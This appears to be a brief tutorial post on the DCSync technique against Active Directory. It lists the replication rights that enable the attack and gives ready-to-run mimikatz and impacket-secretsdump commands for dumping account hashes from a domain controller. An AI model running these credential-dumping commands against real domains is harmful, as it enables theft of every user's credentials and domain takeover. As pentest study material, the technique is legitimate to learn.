Attacking Domain Controller Synchronization
The DRS Directory Replication Service is responsible to replicate a DC’s data to multiple redundant DC’s.
Scenario: You own a user who has one of the following rights:
- Replicating Directory Changes
- Replicating Directory Changes All
- Replicating Directory Changes in Filtered Set
Normally, users in the following groups have these (could be configured otherwise, of course):
- Domain Admins
- Enterprise Admins
- Administrators
You can check with the script in Basic Active Directory Enumeration which users in the domain have these permissions.
If you have the power:
On Windows
- Start mimikatz
- Execute for the user with the permissions. Mimikatz will impersonating as a DC and using replication commands to get all credentials from the given user:
lsadump::dcsync /user:corp\peter - Repeat this for all interesting users. E.g.
lsadump::dcsync /user:corp\Administrator
On Linux
Perform the following against some target with the $adminUser and another/the same $userToBreak to get the hashes from.:
impacket-secretsdump -just-dc-user $userToBreak corp.com/$adminUser:"Winter2023!"@$target
Leave a Reply
You must be logged in to post a comment.